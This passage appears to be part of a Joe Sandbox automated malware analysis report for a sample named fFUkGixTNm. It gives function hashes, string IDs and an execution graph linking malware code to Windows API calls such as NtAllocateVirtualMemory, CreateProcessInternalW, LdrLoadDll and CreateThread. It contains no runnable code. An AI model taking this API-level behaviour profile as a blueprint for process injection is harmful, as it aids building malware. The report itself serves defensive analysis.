                                  • Instruction ID: b9fce77977f9b96134d9e1a9d3b89a75e2a72a5f8e577c2a4cd282c1e144b39f
                                  • Opcode Fuzzy Hash: e1fbfb9a0e45314611f59fe07a5369dd2160a944b84a8f1ba64dfbd543cc00a8
                                  • Instruction Fuzzy Hash: 0F51B471900318EEEB34EFA8CC58BABF7F8EB04700F04491DA5495A180EBB5A564CBA1
                                  Function 03706A19 Relevance: 7.5, Strings: 6, Instructions: 40COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$f$r$x
                                  • API String ID: 0-2523166886
                                  • Opcode ID: a6a0ae151037ace98d20fe88b86024aee5678c22c184e133a172ff35b23abc03
                                  • Instruction ID: 4ee119c02384ad4bb62191e7742754843e62288bfb6373781dc89e2353533388
                                  • Opcode Fuzzy Hash: a6a0ae151037ace98d20fe88b86024aee5678c22c184e133a172ff35b23abc03
                                  • Instruction Fuzzy Hash: 5201A2B1D00318ABDF24EFA488085AEBFB9FF41750F00814DA8047F240E7B64A198B95
                                  Function 037066FE Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o$A9Z
                                  • API String ID: 0-2823261680
                                  • Opcode ID: a4c8c626b49c9416086979bef8ffe998c552bd1fe46c14c2384f7cc478796446
                                  • Instruction ID: 5214212013f3f913f7f08cf58774107074aa1b36062bdc82511633024b29f6b4
                                  • Opcode Fuzzy Hash: a4c8c626b49c9416086979bef8ffe998c552bd1fe46c14c2384f7cc478796446
                                  • Instruction Fuzzy Hash: EF8188B6C11318AAEB15EB94CD55FEFB37CEF48600F0041DDE509AA180EB749B948FA1
                                  Function 0370613E Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 84219f62106f740b3efb70774f9656afcd4841226ee15e45f2b871136f746158
                                  • Instruction ID: 419bf7313e660fe0e197e6efbe1239848aeb74284b58bd0dabc8e94dececc30b
                                  • Opcode Fuzzy Hash: 84219f62106f740b3efb70774f9656afcd4841226ee15e45f2b871136f746158
                                  • Instruction Fuzzy Hash: 896150B6900304AFDB24DBA4CC94FEFB7FCEB49710F144558E519A7280E735AA55CBA0
                                  Function 0370613A Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: aa38f8aa0f8a8433130b31793d0127ad2343df1938fac59de76e0f7290e58e63
                                  • Instruction ID: b58e9bef55a9ec799e3ea822c263edcf5e61f1c576948332321737317b742100
                                  • Opcode Fuzzy Hash: aa38f8aa0f8a8433130b31793d0127ad2343df1938fac59de76e0f7290e58e63
                                  • Instruction Fuzzy Hash: E541F9B5A00308AFDB20DFA4CC94BEFBBF9EB49704F104559E519AB280D775AA458B60
                                  Function 037066F4 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o$A9Z
                                  • API String ID: 0-2823261680
                                  • Opcode ID: 8073f8db20c38680884c64937b7ec14348025e7d37683932a60b1e708fbb0118
                                  • Instruction ID: c7059a7821ec015d11eac504583f3c1a8b6a503ad76f0a013d32d89bcf5de1ad
                                  • Opcode Fuzzy Hash: 8073f8db20c38680884c64937b7ec14348025e7d37683932a60b1e708fbb0118
                                  • Instruction Fuzzy Hash: 044184B6D01318AAEB14EFA4CD54FDFB379AF08700F0041DDA509AA180EB745B948FA5
                                  Function 03701F9E Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2$6$7$B$Q
                                  • API String ID: 0-1857536651
                                  • Opcode ID: 823051863333396e472862e700179fb64f35d6e43c2ef82e076fbab20e45a9dd
                                  • Instruction ID: 76c600113d4fecf8a75d035f1459fc7b5d458c93d65667792dacf43d35c7b748
                                  • Opcode Fuzzy Hash: 823051863333396e472862e700179fb64f35d6e43c2ef82e076fbab20e45a9dd
                                  • Instruction Fuzzy Hash: 9D3166B6911219BBDB10DFA4CD45FEF77BCEF44304F004188E904AB241E775AA158BE5
                                  Function 036F375E Relevance: 6.3, Strings: 5, Instructions: 43COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &$@$T$r$|
                                  • API String ID: 0-2936373407
                                  • Opcode ID: 52b834935e16f86e24be3f63f00b82829789106f15dc9b3570ab1c075fda1b2c
                                  • Instruction ID: 3b9a1b0fdef70ec0453bf060b55d40d722a1702ac61597201fdc9318fe4144c2
                                  • Opcode Fuzzy Hash: 52b834935e16f86e24be3f63f00b82829789106f15dc9b3570ab1c075fda1b2c
                                  • Instruction Fuzzy Hash: 5E11C920D087CEDADB12C6BC84086AEBF715F23224F0883D9D5E52B2D2D2795706D7A6
                                  Function 03705DCE Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: c06b0bbbf0f0ac409cdb68b6c717e785402c6fd4fbcd9262218775041f353502
                                  • Instruction ID: bf165e991e51673c0003298969bd2c85d95c54bbdb9ae1af649af27f02578bf4
                                  • Opcode Fuzzy Hash: c06b0bbbf0f0ac409cdb68b6c717e785402c6fd4fbcd9262218775041f353502
                                  • Instruction Fuzzy Hash: 96B11CB5A00308AFDB24DBA4CC84FEFB7FDAF88710F148558F65997284D675AA41CB60
                                  Function 03705DCB Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 6354a86ce7c55dedb1c0a3f959fa7e8616980a11b3a83cd96a6846db4cb6c54e
                                  • Instruction ID: e3fd8290e9d876185167b0d499d94dfe07573ce5c803963a21f05b5fc5adf12f
                                  • Opcode Fuzzy Hash: 6354a86ce7c55dedb1c0a3f959fa7e8616980a11b3a83cd96a6846db4cb6c54e
                                  • Instruction Fuzzy Hash: 4B610E75A04308AFDB24DFA4CC84FEFB7FDAF88700F244558E6599B284D775AA418B60
                                  Function 03705C8E Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-2877786613
                                  • Opcode ID: 63d2eb0e3249d1c6dd8d0ca2881b2442c2c3f3bc9dc3679fc2f1479db113e48d
                                  • Instruction ID: b621f86176dad21f6c800cfad8cc828b5bf3e9416fd54b7d94d7caea176b3e96
                                  • Opcode Fuzzy Hash: 63d2eb0e3249d1c6dd8d0ca2881b2442c2c3f3bc9dc3679fc2f1479db113e48d
                                  • Instruction Fuzzy Hash: 1341BE76941288BBEB15EB94CC45FEF777C9F49600F104448FA00BF180EBB06A1187B6
                                  Function 03705C8C Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-2877786613
                                  • Opcode ID: b9a3f6f4810d2dc56e353225c014313bd2a8ececf4940fd5aaa9647a88d9ea9f
                                  • Instruction ID: 1c9d005008cf7c2cce3575c540e28a988b45f8376f01e0ed2bafc6827064c9cd
                                  • Opcode Fuzzy Hash: b9a3f6f4810d2dc56e353225c014313bd2a8ececf4940fd5aaa9647a88d9ea9f
                                  • Instruction Fuzzy Hash: D541AF76951298BAEB15EB94CC45FEF777C9F49700F104049FA00BF180D7B56A1187B6
                                  Function 037033D9 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 38fb880483433567aeeac27345e518c91e355d7381beb93b08449d7e009cdd7c
                                  • Instruction ID: 1c455a5179ba9172a2634994f6982f9f80445640bdd7060bcf2425069d6df581
                                  • Opcode Fuzzy Hash: 38fb880483433567aeeac27345e518c91e355d7381beb93b08449d7e009cdd7c
                                  • Instruction Fuzzy Hash: D911ADB6900308EFDB14DF98D884ADEBBB9FF08314F048259E919AF205E771D954CBA0
                                  Function 037033DE Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: a1a7c1d068b8f31ef7901ff97af7a7792dca12bbdf6e42c4c39a1ffa440d1abd
                                  • Instruction ID: 66de3b8891fa5629567851af71007aac8aeecbfefe000562134018c7e7af0b53
                                  • Opcode Fuzzy Hash: a1a7c1d068b8f31ef7901ff97af7a7792dca12bbdf6e42c4c39a1ffa440d1abd
                                  • Instruction Fuzzy Hash: 2901ADB2900308ABDB14DF98D884ADEB7B9FF08314F048209E919AB205E771E944CBA0

                                  Execution Graph

                                  Execution Coverage:2.5%
                                  Dynamic/Decrypted Code Coverage:4.2%
                                  Signature Coverage:2.2%
                                  Total number of Nodes:450
                                  Total number of Limit Nodes:70
                                  execution_graph 99438 3278267 99440 327826a 99438->99440 99439 3278221 99440->99439 99442 3276a00 LdrInitializeThunk LdrInitializeThunk 99440->99442 99442->99439 99445 326b060 99446 328acd0 NtAllocateVirtualMemory 99445->99446 99447 326c6d1 99446->99447 99060 3276da0 99061 3276e0c 99060->99061 99062 3276db5 99060->99062 99062->99061 99064 327ac90 99062->99064 99065 327acb6 99064->99065 99066 327aee6 99065->99066 99091 32890c0 99065->99091 99066->99061 99068 327ad2f 99068->99066 99094 328c050 99068->99094 99070 327ad4e 99070->99066 99071 327ae1f 99070->99071 99100 3288330 99070->99100 99074 32755a0 LdrInitializeThunk 99071->99074 99075 327ae3e 99071->99075 99074->99075 99079 327aece 99075->99079 99111 3287ee0 99075->99111 99076 327ae07 99107 3277b60 99076->99107 99077 327adb6 99077->99066 99077->99076 99078 327ade5 99077->99078 99104 32755a0 99077->99104 99126 3284130 LdrInitializeThunk 99078->99126 99081 3277b60 LdrInitializeThunk 99079->99081 99086 327aedc 99081->99086 99086->99061 99087 327aea5 99116 3287f80 99087->99116 99089 327aebf 99121 32880d0 99089->99121 99092 32890dd 99091->99092 99093 32890ee CreateProcessInternalW 99092->99093 99093->99068 99095 328bfc0 99094->99095 99097 328c01d 99095->99097 99127 328ae40 99095->99127 99097->99070 99098 328bffa 99130 328ad60 99098->99130 99101 328834a 99100->99101 99139 3a52c0a 99101->99139 99102 327adad 99102->99071 99102->99077 99106 32755de 99104->99106 99142 3288500 99104->99142 99106->99078 99108 3277b73 99107->99108 99148 3288230 99108->99148 99110 3277b9e 99110->99061 99112 3287f54 99111->99112 99114 3287f05 99111->99114 99154 3a539b0 LdrInitializeThunk 99112->99154 99113 3287f79 99113->99087 99114->99087 99117 3287ff4 99116->99117 99118 3287fa5 99116->99118 99155 3a54340 LdrInitializeThunk 99117->99155 99118->99089 99119 3288019 99119->99089 99122 3288144 99121->99122 99124 32880f5 99121->99124 99156 3a52fb0 LdrInitializeThunk 99122->99156 99123 3288169 99123->99079 99124->99079 99126->99076 99133 3288fe0 99127->99133 99129 328ae5b 99129->99098 99136 3289030 99130->99136 99132 328ad79 99132->99097 99134 3288ffd 99133->99134 99135 328900e RtlAllocateHeap 99134->99135 99135->99129 99137 328904a 99136->99137 99138 328905b RtlFreeHeap 99137->99138 99138->99132 99140 3a52c11 99139->99140 99141 3a52c1f LdrInitializeThunk 99139->99141 99140->99102 99141->99102 99143 32885a4 99142->99143 99144 3288525 99142->99144 99147 3a52d10 LdrInitializeThunk 99143->99147 99144->99106 99145 32885e9 99145->99106 99147->99145 99149 3288258 99148->99149 99150 32882a8 99148->99150 99149->99110 99153 3a52dd0 LdrInitializeThunk 99150->99153 99151 32882cd 99151->99110 99153->99151 99154->99113 99155->99119 99156->99123 99157 3275620 99158 3277b60 LdrInitializeThunk 99157->99158 99159 3275650 99158->99159 99161 327567c 99159->99161 99162 3277ae0 99159->99162 99163 3277b24 99162->99163 99165 3277b45 99163->99165 99169 3288020 99163->99169 99165->99159 99166 3277b35 99167 3277b51 99166->99167 99174 3288cc0 99166->99174 99167->99159 99170 3288097 99169->99170 99171 3288048 99169->99171 99177 3a54650 LdrInitializeThunk 99170->99177 99171->99166 99172 32880bc 99172->99166 99175 3288cdd 99174->99175 99176 3288cee NtClose 99175->99176 99176->99165 99177->99172 99448 3270860 99449 3270879 99448->99449 99450 3273fc0 LdrLoadDll 99449->99450 99451 3270894 99450->99451 99452 32708e0 99451->99452 99453 32708cd PostThreadMessageW 99451->99453 99453->99452 99178 3281120 99179 328113c 99178->99179 99180 3281178 99179->99180 99181 3281164 99179->99181 99183 3288cc0 NtClose 99180->99183 99182 3288cc0 NtClose 99181->99182 99185 328116d 99182->99185 99184 3281181 99183->99184 99188 328ae80 RtlAllocateHeap 99184->99188 99187 328118c 99188->99187 99189 3285a20 99190 3285a7a 99189->99190 99192 3285a87 99190->99192 99193 3283440 99190->99193 99200 328acd0 99193->99200 99195 328347e 99196 328357e 99195->99196 99203 3273fc0 99195->99203 99196->99192 99198 3283500 Sleep 99199 32834be 99198->99199 99199->99196 99199->99198 99208 3288e20 99200->99208 99202 328ad01 99202->99195 99205 3273fe4 99203->99205 99204 3273feb 99204->99199 99205->99204 99206 3274037 99205->99206 99207 3274020 LdrLoadDll 99205->99207 99206->99199 99207->99206 99209 3288e48 99208->99209 99210 3288eaf 99208->99210 99209->99202 99211 3288ec5 NtAllocateVirtualMemory 99210->99211 99211->99202 99212 3288c20 99213 3288c48 99212->99213 99214 3288c91 99212->99214 99215 3288ca7 NtDeleteFile 99214->99215 99454 32882e0 99455 32882fa 99454->99455 99458 3a52df0 LdrInitializeThunk 99455->99458 99456 3288322 99458->99456 99459 328aa60 99460 328aa6b 99459->99460 99462 328aa87 99460->99462 99463 32854a0 99460->99463 99464 3285502 99463->99464 99466 328550f 99464->99466 99467 3271d90 99464->99467 99466->99462 99468 3271d9e 99467->99468 99469 3271d2c 99467->99469 99470 3288330 LdrInitializeThunk 99469->99470 99471 3271d66 99470->99471 99474 3288d60 99471->99474 99473 3271d7b 99473->99466 99475 3288de9 99474->99475 99477 3288d88 99474->99477 99479 3a52e80 LdrInitializeThunk 99475->99479 99476 3288e1a 99476->99473 99477->99473 99479->99476 99486 3269b70 99489 3269d89 99486->99489 99487 326a1ae 99489->99487 99490 328a9d0 99489->99490 99491 328a9f6 99490->99491 99496 3264130 99491->99496 99493 328aa02 99494 328aa3b 99493->99494 99499 3284fb0 99493->99499 99494->99487 99503 3272c80 99496->99503 99498 326413d 99498->99493 99500 3285012 99499->99500 99502 328501f 99500->99502 99514 3271490 99500->99514 99502->99494 99505 3272c9d 99503->99505 99504 3272cb6 99504->99498 99505->99504 99507 3289720 99505->99507 99509 328973a 99507->99509 99508 3289769 99508->99504 99509->99508 99510 3288330 LdrInitializeThunk 99509->99510 99511 32897c9 99510->99511 99512 328ad60 RtlFreeHeap 99511->99512 99513 32897e2 99512->99513 99513->99504 99515 32714cb 99514->99515 99530 32778f0 99515->99530 99517 32714d3 99518 32717b0 99517->99518 99519 328ae40 RtlAllocateHeap 99517->99519 99518->99502 99520 32714e9 99519->99520 99521 328ae40 RtlAllocateHeap 99520->99521 99522 32714fa 99521->99522 99523 328ae40 RtlAllocateHeap 99522->99523 99524 327150b 99523->99524 99529 32715a8 99524->99529 99545 3276490 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99524->99545 99526 3273fc0 LdrLoadDll 99527 327175f 99526->99527 99541 32878f0 99527->99541 99529->99526 99531 327791c 99530->99531 99532 32777e0 2 API calls 99531->99532 99533 327793f 99532->99533 99534 3277961 99533->99534 99535 3277949 99533->99535 99536 327797d 99534->99536 99539 3288cc0 NtClose 99534->99539 99537 3277954 99535->99537 99538 3288cc0 NtClose 99535->99538 99536->99517 99537->99517 99538->99537 99540 3277973 99539->99540 99540->99517 99542 3287952 99541->99542 99544 328795f 99542->99544 99546 32717c0 99542->99546 99544->99518 99545->99529 99562 3277bc0 99546->99562 99548 3271d16 99548->99544 99549 32717e0 99549->99548 99566 3280af0 99549->99566 99552 32719fa 99554 328c050 2 API calls 99552->99554 99553 327183e 99553->99548 99569 328bf20 99553->99569 99556 3271a0f 99554->99556 99555 3277b60 LdrInitializeThunk 99558 3271a50 99555->99558 99556->99558 99574 3270300 99556->99574 99558->99548 99558->99555 99559 3270300 LdrInitializeThunk 99558->99559 99559->99558 99560 3277b60 LdrInitializeThunk 99561 3271b98 99560->99561 99561->99558 99561->99560 99563 3277bcd 99562->99563 99564 3277bf3 99563->99564 99565 3277bec SetErrorMode 99563->99565 99564->99549 99565->99564 99567 328acd0 NtAllocateVirtualMemory 99566->99567 99568 3280b11 99567->99568 99568->99553 99570 328bf30 99569->99570 99571 328bf36 99569->99571 99570->99552 99572 328ae40 RtlAllocateHeap 99571->99572 99573 328bf5c 99572->99573 99573->99552 99577 3288f40 99574->99577 99578 3288f5a 99577->99578 99581 3a52c70 LdrInitializeThunk 99578->99581 99579 3270322 99579->99561 99581->99579 99216 327f230 99217 327f294 99216->99217 99247 3275d30 99217->99247 99219 327f3ce 99220 327f3c7 99220->99219 99254 3275e40 99220->99254 99224 327f46e 99225 327f582 99224->99225 99263 327f010 99224->99263 99226 3288cc0 NtClose 99225->99226 99228 327f58c 99226->99228 99229 327f486 99229->99225 99230 327f491 99229->99230 99231 328ae40 RtlAllocateHeap 99230->99231 99232 327f4ba 99231->99232 99233 327f4c3 99232->99233 99234 327f4d9 99232->99234 99235 3288cc0 NtClose 99233->99235 99272 327ef00 CoInitialize 99234->99272 99237 327f4cd 99235->99237 99238 327f4e7 99275 3288790 99238->99275 99240 327f562 99241 3288cc0 NtClose 99240->99241 99242 327f56c 99241->99242 99243 328ad60 RtlFreeHeap 99242->99243 99245 327f573 99243->99245 99244 327f505 99244->99240 99246 3288790 LdrInitializeThunk 99244->99246 99246->99244 99249 3275d63 99247->99249 99248 3275d87 99248->99220 99249->99248 99279 3288840 99249->99279 99251 3275daa 99251->99248 99252 3288cc0 NtClose 99251->99252 99253 3275e2c 99252->99253 99253->99220 99255 3275e65 99254->99255 99284 3288630 99255->99284 99258 3286850 99259 32868b5 99258->99259 99260 32868e8 99259->99260 99289 327fdec RtlFreeHeap 99259->99289 99260->99224 99262 32868ca 99262->99224 99264 327f02c 99263->99264 99265 3273fc0 LdrLoadDll 99264->99265 99267 327f047 99265->99267 99266 327f050 99266->99229 99267->99266 99268 3273fc0 LdrLoadDll 99267->99268 99269 327f11b 99268->99269 99270 3273fc0 LdrLoadDll 99269->99270 99271 327f178 99269->99271 99270->99271 99271->99229 99274 327ef65 99272->99274 99273 327effb CoUninitialize 99273->99238 99274->99273 99276 32887ad 99275->99276 99290 3a52ba0 LdrInitializeThunk 99276->99290 99277 32887dd 99277->99244 99280 328885a 99279->99280 99283 3a52ca0 LdrInitializeThunk 99280->99283 99281 3288886 99281->99251 99283->99281 99285 328864a 99284->99285 99288 3a52c60 LdrInitializeThunk 99285->99288 99286 3275ed9 99286->99245 99286->99258 99288->99286 99289->99262 99290->99277 99291 3288b30 99292 3288bd1 99291->99292 99294 3288b58 99291->99294 99293 3288be7 NtReadFile 99292->99293 99295 32814b0 99296 32814c9 99295->99296 99297 3281511 99296->99297 99300 3281554 99296->99300 99302 3281559 99296->99302 99298 328ad60 RtlFreeHeap 99297->99298 99299 3281521 99298->99299 99301 328ad60 RtlFreeHeap 99300->99301 99301->99302 99582 3288170 99583 32881f9 99582->99583 99585 3288198 99582->99585 99587 3a52ee0 LdrInitializeThunk 99583->99587 99584 328822a 99587->99584 99303 3272b83 99308 32777e0 99303->99308 99306 3272baf 99307 3288cc0 NtClose 99307->99306 99309 3272b93 99308->99309 99310 32777fa 99308->99310 99309->99306 99309->99307 99314 32883d0 99310->99314 99313 3288cc0 NtClose 99313->99309 99315 32883ed 99314->99315 99318 3a535c0 LdrInitializeThunk 99315->99318 99316 32778ca 99316->99313 99318->99316 99319 327fb00 99320 327fb1d 99319->99320 99321 3273fc0 LdrLoadDll 99320->99321 99322 327fb38 99321->99322 99323 3286850 RtlFreeHeap 99322->99323 99324 327fcc5 99322->99324 99323->99324 99325 327a780 99330 327a490 99325->99330 99327 327a78d 99344 327a110 99327->99344 99329 327a7a3 99331 327a4b5 99330->99331 99355 3277dc0 99331->99355 99334 327a600 99334->99327 99336 327a617 99336->99327 99337 327a60e 99337->99336 99339 327a705 99337->99339 99374 3279b60 99337->99374 99341 327a76a 99339->99341 99383 3279ed0 99339->99383 99342 328ad60 RtlFreeHeap 99341->99342 99343 327a771 99342->99343 99343->99327 99345 327a123 99344->99345 99352 327a12e 99344->99352 99346 328ae40 RtlAllocateHeap 99345->99346 99346->99352 99347 327a14f 99347->99329 99348 3277dc0 GetFileAttributesW 99348->99352 99349 327a462 99350 327a478 99349->99350 99351 328ad60 RtlFreeHeap 99349->99351 99350->99329 99351->99350 99352->99347 99352->99348 99352->99349 99353 3279b60 RtlFreeHeap 99352->99353 99354 3279ed0 RtlFreeHeap 99352->99354 99353->99352 99354->99352 99356 3277ddf 99355->99356 99357 3277de6 GetFileAttributesW 99356->99357 99358 3277df1 99356->99358 99357->99358 99358->99334 99359 3282d40 99358->99359 99360 3282d4e 99359->99360 99361 3282d55 99359->99361 99360->99337 99362 3273fc0 LdrLoadDll 99361->99362 99363 3282d87 99362->99363 99364 3282d96 99363->99364 99387 3282800 LdrLoadDll 99363->99387 99365 328ae40 RtlAllocateHeap 99364->99365 99370 3282f44 99364->99370 99367 3282daf 99365->99367 99368 3282f3a 99367->99368 99367->99370 99371 3282dcb 99367->99371 99369 328ad60 RtlFreeHeap 99368->99369 99368->99370 99369->99370 99370->99337 99371->99370 99372 328ad60 RtlFreeHeap 99371->99372 99373 3282f2e 99372->99373 99373->99337 99375 3279b86 99374->99375 99388 327d570 99375->99388 99377 3279bf8 99379 3279d80 99377->99379 99380 3279c16 99377->99380 99378 3279d65 99378->99337 99379->99378 99381 3279a20 RtlFreeHeap 99379->99381 99380->99378 99393 3279a20 99380->99393 99381->99379 99384 3279ef6 99383->99384 99385 327d570 RtlFreeHeap 99384->99385 99386 3279f7d 99385->99386 99386->99339 99387->99364 99390 327d594 99388->99390 99389 327d5a1 99389->99377 99390->99389 99391 328ad60 RtlFreeHeap 99390->99391 99392 327d5e4 99391->99392 99392->99377 99394 3279a3d 99393->99394 99397 327d600 99394->99397 99396 3279b43 99396->99380 99398 327d624 99397->99398 99399 327d6ce 99398->99399 99400 328ad60 RtlFreeHeap 99398->99400 99399->99396 99400->99399 99401 327c000 99403 327c029 99401->99403 99402 327c12c 99403->99402 99404 327c0d0 FindFirstFileW 99403->99404 99404->99402 99405 327c0eb 99404->99405 99406 327c113 FindNextFileW 99405->99406 99406->99405 99407 327c125 FindClose 99406->99407 99407->99402 99408 3276800 99409 3276827 99408->99409 99412 3277990 99409->99412 99411 327684e 99413 32779ad 99412->99413 99419 3288420 99413->99419 99415 32779fd 99416 3277a04 99415->99416 99417 3288500 LdrInitializeThunk 99415->99417 99416->99411 99418 3277a2d 99417->99418 99418->99411 99420 32884b2 99419->99420 99422 3288445 99419->99422 99424 3a52f30 LdrInitializeThunk 99420->99424 99421 32884eb 99421->99415 99422->99415 99424->99421 99593 3276bc0 99594 3276bd9 99593->99594 99598 3276c2c 99593->99598 99596 3288cc0 NtClose 99594->99596 99594->99598 99595 3276d64 99597 3276bf4 99596->99597 99603 3275fc0 NtClose LdrInitializeThunk LdrInitializeThunk 99597->99603 99598->99595 99604 3275fc0 NtClose LdrInitializeThunk LdrInitializeThunk 99598->99604 99600 3276d3e 99600->99595 99605 3276190 NtClose LdrInitializeThunk LdrInitializeThunk 99600->99605 99603->99598 99604->99600 99605->99595 99425 328bf80 99426 328ad60 RtlFreeHeap 99425->99426 99427 328bf95 99426->99427 99606 3279649 99607 3279660 99606->99607 99608 3279665 99606->99608 99609 3279699 99608->99609 99610 328ad60 RtlFreeHeap 99608->99610 99610->99609 99611 3a52ad0 LdrInitializeThunk 99428 3269b10 99429 3269b1f 99428->99429 99430 3269b5d 99429->99430 99431 3269b4a CreateThread 99429->99431 99432 3272190 99433 32721b5 99432->99433 99434 3273fc0 LdrLoadDll 99433->99434 99435 32721e8 99434->99435 99436 3275d30 2 API calls 99435->99436 99437 3272210 99435->99437 99436->99437 99612 32889d0 99613 3288a7e 99612->99613 99615 32889f9 99612->99615 99614 3288a94 NtCreateFile 99613->99614

                                  Executed Functions

                                  Function 03269B70 Relevance: 20.3, Strings: 16, Instructions: 333COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
